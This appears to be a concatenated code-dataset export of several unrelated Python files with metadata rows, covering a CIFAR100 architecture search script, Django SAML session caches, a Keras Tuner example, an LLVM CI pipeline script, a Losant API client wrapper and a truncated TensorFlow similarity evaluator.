prototype = np.stack(topbinaries, axis=-1).mean(axis=-1)
| 39.384615
| 91
| 0.604601
|
ased_util
import sys
import time
import numpy as np
from astore import Astore
from sklearn.model_selection import StratifiedShuffleSplit
import argparse
import torch
import torch.multiprocessing as mp
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim
import torch.utils.data
import torch.utils.data.distributed
import torchvision.transforms as transforms
import torchvision.datasets as datasets
parser = argparse.ArgumentParser(description="Run the ASED search with the given settings")
parse_group = parser.add_mutually_exclusive_group()
parser.add_argument('--cifarpath', required=True, help="path to CIFAR100 dataset")
parser.add_argument('--init', required=True, help="path to init file, including filename")
parser.add_argument('--out', required=True, help="prefix for output files")
parse_group.add_argument('--dense', type=int,
help="enable dense shortcut pattern with given value")
parse_group.add_argument('--residual', type=int,
help="enable residual shortcut pattern with given value")
parser.add_argument('--iter', type=int, default=9,
help="number of search iterations to run")
parser.add_argument('--bound', type=float, default=0.9,
help="the upper bound for probability")
parser.add_argument('--invth', type=int, default=0.65,
help="inversion threshold of prototype norm")
parser.add_argument('--protolimit', type=int, default=10,
help="limit on the inversion count before terminating")
parser.add_argument('--gpus', type=int, default=4,
help="number of GPU devices to use")
parser.add_argument('--netcount', type=int, default=250,
help="networks to sample per GPU")
parser.add_argument('--workers', type=int, default=8,
help="number of data loading CPU workers per GPU")
parser.add_argument('--resume', type=int, default=-1,
help="from which iteration to continue, omit to start from scratch")
args = parser.parse_args()
cifarpath = args.cifarpath
init_path = args.init
out_prefix = args.out
gpu_count = args.gpus
netcount = args.netcount
big_iterations = args.iter
shortcut = 'none'
shortcut_value = 2
if args.dense:
shortcut = 'dense'
shortcut_value = args.dense
if args.residual:
shortcut = 'residual'
shortcut_value = args.residual
prob_bound = args.bound
invert_threshold = args.invth
protolimit = args.protolimit
inv_counter = 0
base_lr = 0.01
momentum = 0.9
workers = args.workers
epochs = 20
batch_size = 128
class_count = 100
top_slice = 100
cudnn.benchmark = False
resume = args.resume
normalize = transforms.Normalize(mean=[0.491, 0.482, 0.447],
std=[0.247, 0.243, 0.262])
train_dataset = datasets.CIFAR100(cifarpath, train=True,
transform=transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize]))
test_dataset = datasets.CIFAR100(cifarpath, train=False,
transform=transforms.Compose([
transforms.ToTensor(),
normalize]))
def adjust_learning_rate(optimizer, epoch, lr):
lr = lr * (0.1 ** (epoch // 10))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
return lr
def get_layer_schedule(iteration):
if iteration<2:
return 2
else:
return 1
opLibrary = ased.get_default_library()
def gpu_proc(gpu_id, it, prototype, netcount, train_idx, val_idx, seed):
pars = ['perf', 'runtime', 'cfmat', 'matthews', 'loss', 'params',
'phenotypes']
fname = "./data/"+out_prefix+"_iter"+str(it)+"_gpu"+str(gpu_id)+".pickle"
store = Astore()
for p in pars:
store[p] = []
np.random.seed(seed+gpu_id)
torch.manual_seed(seed+gpu_id)
torch.cuda.set_device(gpu_id)
train_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=batch_size,
sampler=torch.utils.data.sampler.SubsetRandomSampler(train_idx),
num_workers=workers, pin_memory=True)
val_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=batch_size,
sampler=torch.utils.data.sampler.SubsetRandomSampler(val_idx),
num_workers=workers, pin_memory=True)
for n in range(netcount):
if n % 50 == 0:
print("GPU "+str(gpu_id)+" processed "+str(n)+" networks")
net = ased.generate_shortcut_feature_network(3, 32, 32, prototype,
opLibrary,
shortcuts=shortcut,
skip_value=shortcut_value)
store['phenotypes'].append(ased.network_to_phenotype(net))
evnet = ased.EvalNet2(net, class_count).cuda()
crit = nn.CrossEntropyLoss().cuda()
lr = base_lr
optim = torch.optim.SGD(evnet.parameters(), lr,
momentum=momentum)
start = time.time()
for epoch in range(0, epochs):
lr = adjust_learning_rate(optim, epoch, lr)
utorch.train1epoch(train_loader, evnet, crit, optim, epoch,
verbose=False)
store['runtime'].append(time.time()-start)
acc, loss, cfmat = utorch.validate_cfmat(val_loader, evnet, crit,
class_count, verbose=False)
store['loss'].append(loss)
store['cfmat'].append(cfmat)
store['matthews'].append(ased_util.multiclass_matthews(cfmat))
store['perf'].append(acc)
store['params'].append(utorch.count_parameters(evnet))
store.dump(fname)
del evnet
del crit
del optim
store.dump(fname)
print("GPU "+str(gpu_id)+" finished generation "+str(it))
if __name__ == '__main__':
base_seed = 3051991
np.random.seed(base_seed)
torch.manual_seed(base_seed)
pars = ['perf', 'runtime', 'cfmat', 'matthews', 'loss', 'params',
'phenotypes']
mainstore = Astore()
splitter = StratifiedShuffleSplit(n_splits=big_iterations, test_size=0.2)
tr = splitter.split(np.zeros((50000,1)), train_dataset.targets)
if resume == -1:
init_store = Astore()
init_store.load(init_path)
topnets = np.argsort(init_store['matthews'])[-top_slice:][::-1]
topbinaries = [ased.phenotype_to_binary(init_store['phenotypes'][i])
for i in topnets]
prototype = np.stack(topbinaries, axis=-1).mean(axis=-1)
del init_store
else:
print("Resuming the process from iteration "+str(resume))
sname = "./data/"+out_prefix+"_iter"+str(resume)+"_cumul.pickle"
mainstore.load(sname)
topnets = np.argsort(mainstore['matthews'])[-top_slice:][::-1]
topbinaries = [ased.phenotype_to_binary(mainstore['phenotypes'][i])
for i in topnets]
prototype = np.stack(topbinaries, axis=-1).mean(axis=-1)
for it in np.arange(resume+1,big_iterations):
print("Starting evo generation "+str(it))
fname = "./data/"+out_prefix+"_iter"+str(it)+"_cumul.pickle"
for p in pars:
mainstore[p] = []
if np.linalg.norm(prototype,axis=1).mean() > invert_threshold:
print("Inversion threshold reached, prototype modified")
if inv_counter == protolimit:
print("Prototype limit reached, stopping the search")
sys.exit(0)
inv_counter+=1
prototype = ased.invert_prototype(prototype, len(opLibrary),
prob_bound)
add_layer = get_layer_schedule(it)
prototype = np.vstack([prototype,
ased.get_uniform_prototype(add_layer, opLibrary)])
train_idx, val_idx = next(tr)
processes = []
for r in range(gpu_count):
p = mp.Process(target=gpu_proc, args=(r,it, prototype, netcount,
train_idx, val_idx, base_seed))
p.start()
processes.append(p)
for p in processes:
p.join()
smallstore = Astore()
for r in range(gpu_count):
sname = "./data/"+out_prefix+"_iter"+str(it)+"_gpu"+str(r)+".pickle"
smallstore.load(sname)
for v in pars:
mainstore[v].extend(smallstore[v])
mainstore.dump(fname)
topnets = np.argsort(mainstore['matthews'])[-top_slice:][::-1]
topbinaries = [ased.phenotype_to_binary(mainstore['phenotypes'][i])
for i in topnets]
prototype = np.stack(topbinaries, axis=-1).mean(axis=-1)
| true
| true
|
1c40b93725b4401b90eeef6d41c467d228a3c3e7
| 21
|
py
|
Python
|
damCalculator/force/__init__.py
|
YingnanXuUCB/damCalculator
|
c2c7d1b57d87033f41e24fad1cececd96ec7c388
|
[
"MIT"
] | null | null | null |
damCalculator/force/__init__.py
|
YingnanXuUCB/damCalculator
|
c2c7d1b57d87033f41e24fad1cececd96ec7c388
|
[
"MIT"
] | null | null | null |
damCalculator/force/__init__.py
|
YingnanXuUCB/damCalculator
|
c2c7d1b57d87033f41e24fad1cececd96ec7c388
|
[
"MIT"
] | null | null | null |
from .forces import *
| 21
| 21
| 0.761905
|
from .forces import *
| true
| true
|
1c40b967e9798ce772656204f94ecfee89c38b0e
| 2,947
|
py
|
Python
|
djangosaml2/cache.py
|
chander/djangosaml2
|
edeef7e529769e5f7f99801a6a78c53ea7067198
|
[
"Apache-2.0"
] | 5,079
|
2015-01-01T03:39:46.000Z
|
2022-03-31T07:38:22.000Z
|
djangosaml2/cache.py
|
chander/djangosaml2
|
edeef7e529769e5f7f99801a6a78c53ea7067198
|
[
"Apache-2.0"
] | 1,623
|
2015-01-01T08:06:24.000Z
|
2022-03-30T19:48:52.000Z
|
djangosaml2/cache.py
|
chander/djangosaml2
|
edeef7e529769e5f7f99801a6a78c53ea7067198
|
[
"Apache-2.0"
] | 2,033
|
2015-01-04T07:18:02.000Z
|
2022-03-28T19:55:47.000Z
|
# Copyright (C) 2011-2012 Yaco Sistemas (http://www.yaco.es)
# Copyright (C) 2010 Lorenzo Gil Sanchez <lorenzo.gil.sanchez@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from saml2.cache import Cache
class DjangoSessionCacheAdapter(dict):
"""A cache of things that are stored in the Django Session"""
key_prefix = '_saml2'
def __init__(self, django_session, key_suffix):
self.session = django_session
self.key = self.key_prefix + key_suffix
super(DjangoSessionCacheAdapter, self).__init__(self._get_objects())
def _get_objects(self):
return self.session.get(self.key, {})
def _set_objects(self, objects):
self.session[self.key] = objects
def sync(self):
# Changes in inner objects do not cause session invalidation
# https://docs.djangoproject.com/en/1.9/topics/http/sessions/#when-sessions-are-saved
#add objects to session
self._set_objects(dict(self))
#invalidate session
self.session.modified = True
class OutstandingQueriesCache(object):
"""Handles the queries that have been sent to the IdP and have not
been replied yet.
"""
def __init__(self, django_session):
self._db = DjangoSessionCacheAdapter(django_session,
'_outstanding_queries')
def outstanding_queries(self):
return self._db._get_objects()
def set(self, saml2_session_id, came_from):
self._db[saml2_session_id] = came_from
self._db.sync()
def delete(self, saml2_session_id):
if saml2_session_id in self._db:
del self._db[saml2_session_id]
self._db.sync()
class IdentityCache(Cache):
"""Handles information about the users that have been succesfully
logged in.
This information is useful because when the user logs out we must
know where does he come from in order to notify such IdP/AA.
The current implementation stores this information in the Django session.
"""
def __init__(self, django_session):
self._db = DjangoSessionCacheAdapter(django_session, '_identities')
self._sync = True
class StateCache(DjangoSessionCacheAdapter):
"""Store state information that is needed to associate a logout
request with its response.
"""
def __init__(self, django_session):
super(StateCache, self).__init__(django_session, '_state')
| 32.744444
| 93
| 0.695283
|
from saml2.cache import Cache
class DjangoSessionCacheAdapter(dict):
key_prefix = '_saml2'
def __init__(self, django_session, key_suffix):
self.session = django_session
self.key = self.key_prefix + key_suffix
super(DjangoSessionCacheAdapter, self).__init__(self._get_objects())
def _get_objects(self):
return self.session.get(self.key, {})
def _set_objects(self, objects):
self.session[self.key] = objects
def sync(self):
_set_objects(dict(self))
self.session.modified = True
class OutstandingQueriesCache(object):
def __init__(self, django_session):
self._db = DjangoSessionCacheAdapter(django_session,
'_outstanding_queries')
def outstanding_queries(self):
return self._db._get_objects()
def set(self, saml2_session_id, came_from):
self._db[saml2_session_id] = came_from
self._db.sync()
def delete(self, saml2_session_id):
if saml2_session_id in self._db:
del self._db[saml2_session_id]
self._db.sync()
class IdentityCache(Cache):
def __init__(self, django_session):
self._db = DjangoSessionCacheAdapter(django_session, '_identities')
self._sync = True
class StateCache(DjangoSessionCacheAdapter):
def __init__(self, django_session):
super(StateCache, self).__init__(django_session, '_state')
| true
| true
|
1c40b99599236f6163dc5f14cd48f334f09c239c
| 1,891
|
py
|
Python
|
tutorials/tunable_xception_cifar10/tunable_xception_cifar10.py
|
Gonaz/keras-tuner
|
f8264811d4744abb4f0fdab480e8a4e6ddf91c4e
|
[
"Apache-2.0"
] | 1
|
2020-11-08T17:04:21.000Z
|
2020-11-08T17:04:21.000Z
|
tutorials/tunable_xception_cifar10/tunable_xception_cifar10.py
|
Gonaz/keras-tuner
|
f8264811d4744abb4f0fdab480e8a4e6ddf91c4e
|
[
"Apache-2.0"
] | null | null | null |
tutorials/tunable_xception_cifar10/tunable_xception_cifar10.py
|
Gonaz/keras-tuner
|
f8264811d4744abb4f0fdab480e8a4e6ddf91c4e
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 The Keras Tuner Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Example on how to use Tunable Xception."""
from tensorflow.keras.utils import to_categorical
from tensorflow.keras.datasets import cifar10
from kerastuner.applications import HyperXception
from kerastuner import RandomSearch
# Import the Cifar10 dataset.
NUM_CLASSES = 10
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
y_train = to_categorical(y_train, NUM_CLASSES)
y_test = to_categorical(y_test, NUM_CLASSES)
# Import an hypertunable version of Xception.
hypermodel = HyperXception(
input_shape=x_train.shape[1:],
classes=NUM_CLASSES)
# Initialize the hypertuner: we should find the model that maximixes the
# validation accuracy, using 40 trials in total.
tuner = RandomSearch(
hypermodel,
objective='val_accuracy',
max_trials=40,
project_name='cifar10_xception',
directory='test_directory')
# Display search overview.
tuner.search_space_summary()
# Performs the hypertuning.
tuner.search(x_train, y_train, epochs=10, validation_split=0.1)
# Show the best models, their hyperparameters, and the resulting metrics.
tuner.results_summary()
# Retrieve the best model.
best_model = tuner.get_best_models(num_models=1)[0]
# Evaluate the best model.
loss, accuracy = best_model.evaluate(x_test, y_test)
print('loss:', loss)
print('accuracy:', accuracy)
| 32.603448
| 74
| 0.773665
|
from tensorflow.keras.utils import to_categorical
from tensorflow.keras.datasets import cifar10
from kerastuner.applications import HyperXception
from kerastuner import RandomSearch
NUM_CLASSES = 10
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
y_train = to_categorical(y_train, NUM_CLASSES)
y_test = to_categorical(y_test, NUM_CLASSES)
hypermodel = HyperXception(
input_shape=x_train.shape[1:],
classes=NUM_CLASSES)
tuner = RandomSearch(
hypermodel,
objective='val_accuracy',
max_trials=40,
project_name='cifar10_xception',
directory='test_directory')
tuner.search_space_summary()
tuner.search(x_train, y_train, epochs=10, validation_split=0.1)
tuner.results_summary()
best_model = tuner.get_best_models(num_models=1)[0]
loss, accuracy = best_model.evaluate(x_test, y_test)
print('loss:', loss)
print('accuracy:', accuracy)
| true
| true
|
1c40b9c3406064309f1ba271b8940f616aec18fa
| 1,936
|
py
|
Python
|
scripts/pipeline_main.py
|
rnk/llvm-premerge-checks
|
859df4066fc06d9151e22530fce3309174cb5470
|
[
"Apache-2.0"
] | null | null | null |
scripts/pipeline_main.py
|
rnk/llvm-premerge-checks
|
859df4066fc06d9151e22530fce3309174cb5470
|
[
"Apache-2.0"
] | null | null | null |
scripts/pipeline_main.py
|
rnk/llvm-premerge-checks
|
859df4066fc06d9151e22530fce3309174cb5470
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# Copyright 2020 Google LLC
#
# Licensed under the the Apache License v2.0 with LLVM Exceptions (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://llvm.org/LICENSE.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from steps import generic_linux, generic_windows, from_shell_output
import yaml
steps_generators = [
'${BUILDKITE_BUILD_CHECKOUT_PATH}/libcxx/utils/ci/buildkite-pipeline-snapshot.sh',
]
if __name__ == '__main__':
scripts_refspec = os.getenv("ph_scripts_refspec", "main")
no_cache = os.getenv('ph_no_cache') is not None
projects = os.getenv('ph_projects', 'clang;clang-tools-extra;libc;libcxx;libcxxabi;lld;libunwind;mlir;openmp;polly')
log_level = os.getenv('ph_log_level', 'WARNING')
notify_emails = list(filter(None, os.getenv('ph_notify_emails', '').split(',')))
steps = []
steps.extend(generic_linux(
os.getenv('ph_projects', 'clang;clang-tools-extra;libc;libcxx;libcxxabi;lld;libunwind;mlir;openmp;polly'),
False))
# FIXME: openmp is removed as it constantly fails.
# TODO: Make this project list be evaluated through "choose_projects"(? as now we define "all" and exclusions in
# two placess).
steps.extend(generic_windows(
os.getenv('ph_projects', 'clang;clang-tools-extra;libc;libcxx;libcxxabi;lld;libunwind;mlir;polly')))
for gen in steps_generators:
steps.extend(from_shell_output(gen))
notify = []
for e in notify_emails:
notify.append({'email': e})
print(yaml.dump({'steps': steps, 'notify': notify}))
| 39.510204
| 120
| 0.722107
|
import os
from steps import generic_linux, generic_windows, from_shell_output
import yaml
steps_generators = [
'${BUILDKITE_BUILD_CHECKOUT_PATH}/libcxx/utils/ci/buildkite-pipeline-snapshot.sh',
]
if __name__ == '__main__':
scripts_refspec = os.getenv("ph_scripts_refspec", "main")
no_cache = os.getenv('ph_no_cache') is not None
projects = os.getenv('ph_projects', 'clang;clang-tools-extra;libc;libcxx;libcxxabi;lld;libunwind;mlir;openmp;polly')
log_level = os.getenv('ph_log_level', 'WARNING')
notify_emails = list(filter(None, os.getenv('ph_notify_emails', '').split(',')))
steps = []
steps.extend(generic_linux(
os.getenv('ph_projects', 'clang;clang-tools-extra;libc;libcxx;libcxxabi;lld;libunwind;mlir;openmp;polly'),
False))
steps.extend(generic_windows(
os.getenv('ph_projects', 'clang;clang-tools-extra;libc;libcxx;libcxxabi;lld;libunwind;mlir;polly')))
for gen in steps_generators:
steps.extend(from_shell_output(gen))
notify = []
for e in notify_emails:
notify.append({'email': e})
print(yaml.dump({'steps': steps, 'notify': notify}))
| true
| true
|
1c40b9fa431618695234cae3495c1fe3816040dd
| 7,589
|
py
|
Python
|
losantrest/instance_member.py
|
Losant/losant-rest-python
|
50a6ce13dfef7acefb930fe45893c7bae862f784
|
[
"MIT"
] | 5
|
2016-06-16T20:18:11.000Z
|
2022-03-09T11:41:59.000Z
|
losantrest/instance_member.py
|
Losant/losant-rest-python
|
50a6ce13dfef7acefb930fe45893c7bae862f784
|
[
"MIT"
] | 4
|
2021-07-13T06:09:16.000Z
|
2022-03-07T14:24:49.000Z
|
losantrest/instance_member.py
|
Losant/losant-rest-python
|
50a6ce13dfef7acefb930fe45893c7bae862f784
|
[
"MIT"
] | 6
|
2016-11-18T03:19:17.000Z
|
2022-03-09T11:41:47.000Z
|
"""
The MIT License (MIT)
Copyright (c) 2021 Losant IoT, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import json
""" Module for Losant API InstanceMember wrapper class """
# pylint: disable=C0301
class InstanceMember(object):
""" Class containing all the actions for the Instance Member Resource """
def __init__(self, client):
self.client = client
def delete(self, **kwargs):
"""
Deletes an instance member
Authentication:
The client must be configured with a valid api
access token to call this action. The token
must include at least one of the following scopes:
all.Instance, all.User, instanceMember.*, or instanceMember.delete.
Parameters:
* {string} instanceId - ID associated with the instance
* {string} userId - ID associated with the instance member
* {string} losantdomain - Domain scope of request (rarely needed)
* {boolean} _actions - Return resource actions in response
* {boolean} _links - Return resource link in response
* {boolean} _embedded - Return embedded resources in response
Responses:
* 200 - If member was successfully deleted (https://api.losant.com/#/definitions/success)
Errors:
* 400 - Error if malformed request (https://api.losant.com/#/definitions/error)
* 404 - Error if instance or member was not found (https://api.losant.com/#/definitions/error)
"""
query_params = {"_actions": "false", "_links": "true", "_embedded": "true"}
path_params = {}
headers = {}
body = None
if "instanceId" in kwargs:
path_params["instanceId"] = kwargs["instanceId"]
if "userId" in kwargs:
path_params["userId"] = kwargs["userId"]
if "losantdomain" in kwargs:
headers["losantdomain"] = kwargs["losantdomain"]
if "_actions" in kwargs:
query_params["_actions"] = kwargs["_actions"]
if "_links" in kwargs:
query_params["_links"] = kwargs["_links"]
if "_embedded" in kwargs:
query_params["_embedded"] = kwargs["_embedded"]
path = "/instances/{instanceId}/members/{userId}".format(**path_params)
return self.client.request("DELETE", path, params=query_params, headers=headers, body=body)
def get(self, **kwargs):
"""
Returns an instance member
Authentication:
The client must be configured with a valid api
access token to call this action. The token
must include at least one of the following scopes:
all.Instance, all.Instance.read, all.User, all.User.read, instanceMember.*, or instanceMember.get.
Parameters:
* {string} instanceId - ID associated with the instance
* {string} userId - ID associated with the instance member
* {string} losantdomain - Domain scope of request (rarely needed)
* {boolean} _actions - Return resource actions in response
* {boolean} _links - Return resource link in response
* {boolean} _embedded - Return embedded resources in response
Responses:
* 200 - A single instance member (https://api.losant.com/#/definitions/instanceMember)
Errors:
* 400 - Error if malformed request (https://api.losant.com/#/definitions/error)
* 404 - Error if instance or member was not found (https://api.losant.com/#/definitions/error)
"""
query_params = {"_actions": "false", "_links": "true", "_embedded": "true"}
path_params = {}
headers = {}
body = None
if "instanceId" in kwargs:
path_params["instanceId"] = kwargs["instanceId"]
if "userId" in kwargs:
path_params["userId"] = kwargs["userId"]
if "losantdomain" in kwargs:
headers["losantdomain"] = kwargs["losantdomain"]
if "_actions" in kwargs:
query_params["_actions"] = kwargs["_actions"]
if "_links" in kwargs:
query_params["_links"] = kwargs["_links"]
if "_embedded" in kwargs:
query_params["_embedded"] = kwargs["_embedded"]
path = "/instances/{instanceId}/members/{userId}".format(**path_params)
return self.client.request("GET", path, params=query_params, headers=headers, body=body)
def patch(self, **kwargs):
"""
Modifies the role of an instance member
Authentication:
The client must be configured with a valid api
access token to call this action. The token
must include at least one of the following scopes:
all.Instance, all.User, instanceMember.*, or instanceMember.patch.
Parameters:
* {string} instanceId - ID associated with the instance
* {string} userId - ID associated with the instance member
* {hash} member - Object containing new member info (https://api.losant.com/#/definitions/instanceMemberPatch)
* {string} losantdomain - Domain scope of request (rarely needed)
* {boolean} _actions - Return resource actions in response
* {boolean} _links - Return resource link in response
* {boolean} _embedded - Return embedded resources in response
Responses:
* 200 - The modified instance member (https://api.losant.com/#/definitions/instanceMemberPatch)
Errors:
* 400 - Error if malformed request (https://api.losant.com/#/definitions/error)
* 404 - Error if instance or member was not found (https://api.losant.com/#/definitions/error)
"""
query_params = {"_actions": "false", "_links": "true", "_embedded": "true"}
path_params = {}
headers = {}
body = None
if "instanceId" in kwargs:
path_params["instanceId"] = kwargs["instanceId"]
if "userId" in kwargs:
path_params["userId"] = kwargs["userId"]
if "member" in kwargs:
body = kwargs["member"]
if "losantdomain" in kwargs:
headers["losantdomain"] = kwargs["losantdomain"]
if "_actions" in kwargs:
query_params["_actions"] = kwargs["_actions"]
if "_links" in kwargs:
query_params["_links"] = kwargs["_links"]
if "_embedded" in kwargs:
query_params["_embedded"] = kwargs["_embedded"]
path = "/instances/{instanceId}/members/{userId}".format(**path_params)
return self.client.request("PATCH", path, params=query_params, headers=headers, body=body)
| 41.244565
| 119
| 0.646594
|
import json
class InstanceMember(object):
def __init__(self, client):
self.client = client
def delete(self, **kwargs):
query_params = {"_actions": "false", "_links": "true", "_embedded": "true"}
path_params = {}
headers = {}
body = None
if "instanceId" in kwargs:
path_params["instanceId"] = kwargs["instanceId"]
if "userId" in kwargs:
path_params["userId"] = kwargs["userId"]
if "losantdomain" in kwargs:
headers["losantdomain"] = kwargs["losantdomain"]
if "_actions" in kwargs:
query_params["_actions"] = kwargs["_actions"]
if "_links" in kwargs:
query_params["_links"] = kwargs["_links"]
if "_embedded" in kwargs:
query_params["_embedded"] = kwargs["_embedded"]
path = "/instances/{instanceId}/members/{userId}".format(**path_params)
return self.client.request("DELETE", path, params=query_params, headers=headers, body=body)
def get(self, **kwargs):
query_params = {"_actions": "false", "_links": "true", "_embedded": "true"}
path_params = {}
headers = {}
body = None
if "instanceId" in kwargs:
path_params["instanceId"] = kwargs["instanceId"]
if "userId" in kwargs:
path_params["userId"] = kwargs["userId"]
if "losantdomain" in kwargs:
headers["losantdomain"] = kwargs["losantdomain"]
if "_actions" in kwargs:
query_params["_actions"] = kwargs["_actions"]
if "_links" in kwargs:
query_params["_links"] = kwargs["_links"]
if "_embedded" in kwargs:
query_params["_embedded"] = kwargs["_embedded"]
path = "/instances/{instanceId}/members/{userId}".format(**path_params)
return self.client.request("GET", path, params=query_params, headers=headers, body=body)
def patch(self, **kwargs):
query_params = {"_actions": "false", "_links": "true", "_embedded": "true"}
path_params = {}
headers = {}
body = None
if "instanceId" in kwargs:
path_params["instanceId"] = kwargs["instanceId"]
if "userId" in kwargs:
path_params["userId"] = kwargs["userId"]
if "member" in kwargs:
body = kwargs["member"]
if "losantdomain" in kwargs:
headers["losantdomain"] = kwargs["losantdomain"]
if "_actions" in kwargs:
query_params["_actions"] = kwargs["_actions"]
if "_links" in kwargs:
query_params["_links"] = kwargs["_links"]
if "_embedded" in kwargs:
query_params["_embedded"] = kwargs["_embedded"]
path = "/instances/{instanceId}/members/{userId}".format(**path_params)
return self.client.request("PATCH", path, params=query_params, headers=headers, body=body)
| true
| true
|
1c40ba4a9a02a64d3a26fef8c84e71080aba1669
| 3,894
|
py
|
Python
|
similarity/eval_iter.py
|
jtraviesor/alfred-tf-trainer
|
9747d24bef418415a31abfe0c9982d2f1d9d8298
|
[
"MIT"
] | 3
|
2017-11-18T11:41:46.000Z
|
2020-02-13T19:22:28.000Z
|
similarity/eval_iter.py
|
jtraviesor/alfred-tf-trainer
|
9747d24bef418415a31abfe0c9982d2f1d9d8298
|
[
"MIT"
] | 4
|
2017-09-01T05:28:49.000Z
|
2017-11-20T05:27:49.000Z
|
similarity/eval_iter.py
|
jtraviesor/alfred-tf-trainer
|
9747d24bef418415a31abfe0c9982d2f1d9d8298
|
[
"MIT"
] | 1
|
2018-06-08T03:55:32.000Z
|
2018-06-08T03:55:32.000Z
|
#! /usr/bin/env python
import tensorflow as tf
import numpy as np
from input_helpers import InputHelper
from time import sleep
# Parameters
# ==================================================
run_id = 'runs/1503723018'
model_file = run_id + "/checkpoints/model-72000"
# Eval Parameters
tf.flags.DEFINE_integer("batch_size", 64, "Batch Size (default: 64)")
tf.flags.DEFINE_string("checkpoint_dir", "", "Checkpoint directory from training run")
tf.flags.DEFINE_string("eval_filepath", "data/test3.tsv", "Evaluate on this data (Default: None)")
tf.flags.DEFINE_string("vocab_filepath", run_id + "/checkpoints/vocab", "Load training time vocabulary (Default: None)")
tf.flags.DEFINE_string("model", model_file, "Load trained model checkpoint (Default: None)")
# Misc Parameters
tf.flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement")
tf.flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices")
FLAGS = tf.flags.FLAGS
FLAGS._parse_flags()
print("\nParameters:")
for attr, value in sorted(FLAGS.__flags.items()):
print("{}={}".format(attr.upper(), value))
if FLAGS.eval_filepath == None or FLAGS.vocab_filepath == None or FLAGS.model == None:
print("Eval or Vocab filepaths are empty.")
exit()
print("\nRunning iterative evaluation...\n")
# Evaluation
# ==================================================
checkpoint_file = FLAGS.model
print(checkpoint_file)
graph = tf.Graph()
with graph.as_default():
sess = tf.Session()
with sess.as_default():
# Load the saved meta graph and restore variables
saver = tf.train.import_meta_graph("{}.meta".format(checkpoint_file))
init = tf.global_variables_initializer()
sess.run(init)
saver.restore(sess, checkpoint_file)
inpH = InputHelper()
vocab_processor = inpH.restore_vocabulary_processor(FLAGS.vocab_filepath)
# Get the placeholders from the graph by name
input_x1 = graph.get_operation_by_name("input_x1").outputs[0]
input_x1_lens = graph.get_operation_by_name("input_x1_lens").outputs[0]
input_x2 = graph.get_operation_by_name("input_x2").outputs[0]
input_x2_lens = graph.get_operation_by_name("input_x2_lens").outputs[0]
input_y = graph.get_operation_by_name("input_y").outputs[0]
# Tensors we want to evaluate
dropout_keep_prob = graph.get_operation_by_name("dropout_keep_prob").outputs[0]
predictions = graph.get_operation_by_name("output/Softmax").outputs[0]
def get_lengths(x_batch):
def compute_size(x):
last_index = None
for i, e in enumerate(x):
if e is not 0:
last_index = i
return len(x) if last_index is None else last_index + 1
return [compute_size(x) for x in x_batch]
def get_feed_dict(x1_dev_b, x2_dev_b, y_dev_b):
return {
input_x1: x1_dev_b,
input_x1_lens: get_lengths(x1_dev_b),
input_x2: x2_dev_b,
input_x2_lens: get_lengths(x2_dev_b),
input_y: y_dev_b,
dropout_keep_prob: 1.0
}
while True:
s1 = input("S1 >")
s2 = input("S2 >")
x1_test = np.asarray(list(vocab_processor.transform(np.asarray([s1]))))
x2_test = np.asarray(list(vocab_processor.transform(np.asarray([s2]))))
y_test = np.asarray([0.0, 1.0])
# Fixme batch size use to be fixed to 64 in the input placeholders
x1_test = np.tile(x1_test, (64, 1))
x2_test = np.tile(x2_test, (64, 1))
y_test = np.tile(y_test, (64, 1))
batch_predictions = sess.run([predictions], get_feed_dict(x1_test, x2_test, y_test))
print("Prediction:", batch_predictions[0][0][1])
| 40.14433
| 120
| 0.638418
|
import tensorflow as tf
import numpy as np
from input_helpers import InputHelper
from time import sleep
run_id = 'runs/1503723018'
model_file = run_id + "/checkpoints/model-72000"
tf.flags.DEFINE_integer("batch_size", 64, "Batch Size (default: 64)")
tf.flags.DEFINE_string("checkpoint_dir", "", "Checkpoint directory from training run")
